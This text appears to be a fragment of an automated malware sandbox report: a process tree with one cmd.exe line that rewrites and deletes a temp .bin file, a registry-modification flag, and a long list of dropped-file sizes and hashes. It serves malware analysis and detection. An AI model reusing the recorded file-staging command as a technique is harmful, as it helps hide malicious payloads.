C:\Windows\system32\cmd.execmd /U /C "type C:\Users\Admin\AppData\Local\Temp\6602.bin1 > C:\Users\Admin\AppData\Local\Temp\6602.bin & del C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵PID:1980
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:536
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
65KB
MD5a345edcdee52303ac713c76b2366a94c
SHA14452c95702106a78f24f701612788561e04c6407
SHA2564de5d19e13c2eab729c6a8ec04deeda952c11bb9651560a75248f46da86f9f2d
SHA5123286dbb2a3619004b3ed58442cef3bb89db0ab2ab98627674e37db503de1b7c8f2147c99e44ebb8b98a7f6f13ef13b6dd501993b7a0dd0d579e01023b971695a
-
Filesize
44B
MD5f7aea2435aa888b709ca20f816c33bfd
SHA138717c9a73b5f8bd399839cbe0aa57518427e758
SHA256f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5
SHA5121ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
2KB
MD542bfa4737502d07aa54f4c8ee04c5fef
SHA17198ae79a9c046de5d684acfd132b37f00f6a425
SHA2563ab1b367877d3869cf3c6996a677d215ada1f76719a788bd23f622dd311d3d36
SHA5125f8500e06373e66eb5fa954aafb5cbad214994442d67e8d2f21032f350b2d8e6fe7a79083322fb8383deece1678c32cde030e226e12346cd604366351ad74c1d
-
Filesize
2KB
MD542bfa4737502d07aa54f4c8ee04c5fef
SHA17198ae79a9c046de5d684acfd132b37f00f6a425
SHA2563ab1b367877d3869cf3c6996a677d215ada1f76719a788bd23f622dd311d3d36
SHA5125f8500e06373e66eb5fa954aafb5cbad214994442d67e8d2f21032f350b2d8e6fe7a79083322fb8383deece1678c32cde030e226e12346cd604366351ad74c1d
-
Filesize
2KB
MD5f2ea599a2b3969ca84eef5bfcb3872f5
SHA1ea8db863a41c24696622269c1e9a59470d81d5ae
SHA256f4afef97443809ed08b7b279fb70ddef9e3e2ae96dbf0f0f8878d342c53ee765
SHA5126d18d72d27153253d36c2943d01ec09fded565afb6d6094c4a7062132ad60c4ad58ccbfc035644784ed338d543325f2e3062138cafebd4e4b6281f346a03d183
-
Filesize
2KB
MD5550324b3d2c3fccbf11991e605fb633a
SHA10e72da4bfa6e52f9b5627a825038f85135dc341a
SHA256bc7180b72043de2e008063fcc5f952b964d9c9530ad2aab4752aec84095df3a1
SHA51249883798521b722a2f40217ae8c96d960c6ccf31854d4b9008ce86700a67667e0168a798e1fb933e118fde9de890f40fc9ede8617356b7bd58b8ab1a46cc0f20
-
Filesize
2KB
MD5550324b3d2c3fccbf11991e605fb633a
SHA10e72da4bfa6e52f9b5627a825038f85135dc341a
SHA256bc7180b72043de2e008063fcc5f952b964d9c9530ad2aab4752aec84095df3a1
SHA51249883798521b722a2f40217ae8c96d960c6ccf31854d4b9008ce86700a67667e0168a798e1fb933e118fde9de890f40fc9ede8617356b7bd58b8ab1a46cc0f20
-
Filesize
9KB
MD594b550334ec2b1b98472ead5fce8f180
SHA1d2f658d2e49fcdc6c43b91e1dc712922f6412945
SHA25695a7fe2794be40bd2ac401f1b64b163db7c497887cc7833c59191e69cb8a4ca1
SHA512004cfcdf654e8160192b9181586c0ed1493c8638b77cf718f3e5419054b95db288412d98abdbfde6720e283548ad1ab3a172ad3ea33cb9f796c212e928c1d979
-
Filesize
35KB
MD5de21ae01f00b8ae78b2d39e2055d1dc0
SHA1397a864a9dc4f574820996dc4d32a37659d0b531
SHA256d369bd389a25236dfcc4910b99a40c0aab815e3544745230dcabef3beab75937
SHA512d03ae00a7b999682ebfe93858349b01fc95b22910e48958d71aa019ea6d1aa7deb9bd0042c59e2ad07a4d1a454d6969cf86d53be557b93a3871d8c7437a61816
-
Filesize
35KB
MD5de21ae01f00b8ae78b2d39e2055d1dc0
SHA1397a864a9dc4f574820996dc4d32a37659d0b531
SHA256d369bd389a25236dfcc4910b99a40c0aab815e3544745230dcabef3beab75937
SHA512d03ae00a7b999682ebfe93858349b01fc95b22910e48958d71aa019ea6d1aa7deb9bd0042c59e2ad07a4d1a454d6969cf86d53be557b93a3871d8c7437a61816
-
Filesize
64KB
MD5397eb325e338a7924c540b5bcd94e374
SHA1f88da33ae78e5fd848531e462da24a9a7c57de88
SHA2566cbecfa984f5200f16101f26d5e2c21290cfecc9a4621f880cff2e2392b3870c
SHA512f20765df381088b9e293dac8736d1475f90c6a732e7e148afadf69aa862f3f7c414a2a0b02d58555b43fe71cc4d28f737648ea97d0ee18395d472ffd4ab30a1e
-
Filesize
64KB
MD5397eb325e338a7924c540b5bcd94e374
SHA1f88da33ae78e5fd848531e462da24a9a7c57de88
SHA2566cbecfa984f5200f16101f26d5e2c21290cfecc9a4621f880cff2e2392b3870c
SHA512f20765df381088b9e293dac8736d1475f90c6a732e7e148afadf69aa862f3f7c414a2a0b02d58555b43fe71cc4d28f737648ea97d0ee18395d472ffd4ab30a1e
-
Filesize
65KB
MD5f1a2aa1f4f0c2e950ca2e946f24e52a7
SHA15a6aa89b4cd8a10c7e968b3d357e8b438c7533d0
SHA2561fc846218d715bb746962b8978905a7b9f8c559c56ca1ca0d558dfba721d67ed
SHA51254a2825defb8e69afdb4f23cacb80b3ac881a981566dee1eba4d6c916927ef7e74f83ac71959f829da710c540858f183beeef162dcb95ad992249b4732de810f
-
Filesize
65KB
MD5f1a2aa1f4f0c2e950ca2e946f24e52a7
SHA15a6aa89b4cd8a10c7e968b3d357e8b438c7533d0
SHA2561fc846218d715bb746962b8978905a7b9f8c559c56ca1ca0d558dfba721d67ed
SHA51254a2825defb8e69afdb4f23cacb80b3ac881a981566dee1eba4d6c916927ef7e74f83ac71959f829da710c540858f183beeef162dcb95ad992249b4732de810f
-
Filesize
65KB
MD59bae8ae2e7f60de0d8c3f9809a365b5a
SHA1c05309024e67723dbc40583390d9deb970208a30
SHA2569ef11a026250169cb0eca6369809bee07b0f24c5c1933938c25f4f84eb5d0abb
SHA5120a55a13b234f55851cfe4b49d8cbf24c50db3805aeb00a3ca8004824c045fb0a3619e8a038b849f953672e2092a3e43bc945e7902458fb0b580f41cdaeddfc0a
-
Filesize
65KB
MD524e087934651d6f0a5885fa46f185864
SHA1b20946bd3d31fcd75bc758c8e659de9dafaf20eb
SHA256b1626a5b8040ba8fbc5f15bdbde39f8e25177873df1fd2865db6949bc263af02
SHA512f98260eb89115d6f26e03a6d866bd6bebcfb6a02dd69814f9a15e617670527556f8e7fdbc9f72ab323585169b28783a95982b929722294812ef0e4fa91ded06e
-
Filesize
65KB
MD5eb94ae3ce4b86bff9cafe1503fbc001d
SHA10bc3aee0a38c82f1e6775b1428219e7460e38ace
SHA256b037abcec90bc47921db5c251215e9cb135511d0b08ce395fd697b88d1e99f6b
SHA512922243683bad6ef9ccb80fff75c8ff44673acd5c8f52e693c66e3e35589a12bd5ee24d875dea2759d6912a2159aa1d7086e765dd488bfef11eb531c9fe863aa2
-
Filesize
65KB
MD5a345edcdee52303ac713c76b2366a94c
SHA14452c95702106a78f24f701612788561e04c6407
SHA2564de5d19e13c2eab729c6a8ec04deeda952c11bb9651560a75248f46da86f9f2d
SHA5123286dbb2a3619004b3ed58442cef3bb89db0ab2ab98627674e37db503de1b7c8f2147c99e44ebb8b98a7f6f13ef13b6dd501993b7a0dd0d579e01023b971695a
-
Filesize
1KB
MD5a9eead4a76288738990c8668032dd780
SHA1ece0771b0b40abec808cd5e8dedfbebbd4345d68
SHA256925c00351b791b62cd80c6d7dab5f276374ae454146317405984eabd303746dc
SHA512b2ccc1ee6d4eb958098ea279c27093836ccc6a7e2148602fcb5ee2dbc457c169f30179047ab206a85ba66cf696edb6005f0819558a00e372c36458d37b5fa4bb
-
Filesize
1KB
MD5860be3be01f3f3c1bb8223c4b4ebf8d5
SHA198662fcdbf155d942f6aec76e367f0fef5cb1f21
SHA25651f4a4c2de2bb96c36d8e1fc4226bf530d8c3d90347ce8c4244964c1b835ba54
SHA51263f3f394d791aae4dd154109e21dc6d6b21cad707296fbc7ac1c6179febdf17d6313d9b2ef85a8be66aea79f47e983a08af2c551eb4c94a765393a7ce450ba8b
-
Filesize
3KB
MD58495c9cbe1593820014899a043577e1b
SHA1b395a19a3262dc61ea9f3174cad05e194fcbbe57
SHA25608496276bf461cb5696ddbde59bf09077bf8809e27c9e4b4e74d8d59409996c8
SHA512035d7f718a2d50e578b2c1464ddd1fb91a7ef4b656ff9bbd2af4adcdf44b839ce7c759c524ba02fffab3b09aef704a36eba7a0429e3836c7a5c3f0c207bc9715
-
Filesize
3KB
MD5ea0f2464b104a78625ed3074b10d5b26
SHA1871ebae4ea06340b952d4671f6cf79013808bf22
SHA2564823aab825570b456b0ded382a952b148c6fd24127143f214d93e8a9fe8c8506
SHA51282fdfcef702db4bec115d91411e67512a332a7113150fabfcae74f71e9e7090a489f6ebfccaa5e3b28c3c934ce089973e3d07338a47f6d67f2f72f0b998b2f10
-
Filesize
652B
MD5e250c595c30addb02ffc6984e63a7380
SHA1b44e41b7d62b61f9b04eed3e311910f34a0ebedb
SHA25615f35b53c4861185a583a1dbcb3222d7ac9654681b0dbc2fe031d59757baa063
SHA5128abf7fe5b21c2a61c01c7eefcc996d2e7068d245aba9071c7db224abbd32b16610efafca56171728d2da0ebcbeb98116847bdaa8071c2111e8686700f96abfd6
-
Filesize
410B
MD59a10482acb9e6952b96f4efc24d9d783
SHA15cfc9bf668351df25fcda98c3c2d0bb056c026c3
SHA256a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377
SHA512e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28
-
Filesize
369B
MD5f2734214002408a7eccd2fbae5870da5
SHA1fde6d5c4e61dff27f46f69c480155e1101397700
SHA256552cfb233eff0461a558e7e25cea4e6b720ce96953fa1ee5d231c4ae67fdf102
SHA5123e2cfa712aba0bc2ba463e9543e6270f49134533b10aa4b851d5e4aec97c2daec663f484b412715fb3df6496617c97974812fef5edf569a9784377859b3c56b5
-
Filesize
652B
MD583ab673e353bc97b876da6cfc8b171d8
SHA14a661313af68b943f2580cdbcf76b19a89e12734
SHA2562a0cbd619f15e2cc9a716556eed90f2e8f130999317d327fa1d96744309e450e
SHA512a17c1dfffaa789762e8ec8146d1d0c1136f5a706d2c3387965cbb4bf58b35cb7db764164d263ce371cbc4dd39d3a4fad8b18928caaf73307c696e74bfd722f93
-
Filesize
400B
MD5aca9704199c51fde14b8bf8165bc2a4c
SHA1789b408ccad29240bd093515cbd19a199ad2c1c8
SHA256cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27
SHA512a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6
-
Filesize
369B
MD5340f65806e42a1b022861685812d236b
SHA1a53ffde123a1837fe255d764e7a992ab905fb8b9
SHA256b75d827e0d31904c9782c6ed7f767265477310971a1f4335efc140f0f074ceb7
SHA51230b0f1d6ca38cf067b85fb51556b52f2dd743055ea08b8e72d2ad654aff178093d13ca0c19b4b6a1c728978df90b2e7b9941ca2b3bf75694c7220d40b28579bb